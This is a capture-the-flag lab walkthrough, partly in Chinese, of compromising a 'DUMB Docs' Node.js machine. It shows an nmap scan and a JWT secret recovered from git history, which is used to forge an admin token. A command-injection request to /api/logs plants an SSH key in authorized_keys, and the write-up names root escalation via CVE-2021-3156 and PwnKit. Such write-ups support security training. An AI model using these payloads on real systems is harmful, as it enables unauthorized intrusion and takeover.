Overall

Used Skill

  • node.js
  • git leak
  • jwt

Rating

  • ⭐⭐☆☆☆☆☆☆☆☆

Recon

nmap

~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Nmap scan report for 10.10.11.120
Host is up (0.40s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=44381%PV=Y%DS=2%DC=T%G=Y%TM=62332FE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   397.90 ms 10.10.14.1
2   397.73 ms 10.10.11.120

Stats: 0:01:12 elapsed; 1 hosts completed (1 up), 0 undergoing Script Post-Scan
NSE Timing: About 0.00% done
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.82 seconds

Get Shell

  • 80 port 是 Web 頁面,可以下載 source code,該服務架在 3000 port
  • 有個 /api/priv API 需要 theadmin 帳號,用 auth-token header 傳送 jwt token,該 token 用環境變數 TOKEN_SECRET 作為 jwt key
  • 翻看 git log 可以找到被移除的 TOKEN_SECRET,移除後並未修改,使用該 key 得到 theadmin jwt
    ​​​​> const TOKEN_SECRET='gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE'
    ​​​​undefined
    ​​​​> const jwt = require('jsonwebtoken')
    ​​​​undefined
    ​​​​> jwt.sign({ _id: '123', name: 'theadmin' , email:'aa'}, TOKEN_SECRET )
    ​​​​'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA'
    
  • /api/logs 端點有 command injection,直接拼接,透過該端點寫 ssh key 到 ~/.ssh/authorized_keys
GET /api/logs?file=index.js%3becho%20'ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex%2bwC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF%2bO4lVtLunxGbvcN97gCVKb%2bEstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU%2fLnKMFeboKRY4kFhIuSvavy5mflJalTKq%2bBhGZd3DCKHk%2bcbH4FLcoMy9hTy3Js%2bzaw28Td%2bLo4oTm2LP%2fW2w%2fwopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR%2fddQfcCmbMBSp8lXpR%2btkhDNdk82rawaX7HJMmJAY%2bg%2fQEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB%2bF9CAP8Twgom5Mt%2flYPi2N%2fZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7%2bPsmIZnZfSxbhg9FP%2fy1ixD3eoymk%3d%20eethan1%40Magdalene2'%20%3e%20%2fhome%2fdasith%2f.ssh%2fauthorized_keys HTTP/1.1
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA
Host: 10.10.11.120:3000
  • 最後 ssh get shell
ssh -i ~/tmp/id_rsa dasith@10.10.11.120

Privilege Escalation

  • 執行 linpeas.sh 顯示使用 Sudo version 1.8.31 有 CVE-2021-3156 ,試了一下 https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit 沒成功,README 上有特別標註用 sudoedit 判別是不是可以 exploit,試了後是不行 exploit
  • 最後使用 PwnKit 拿到 root
    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →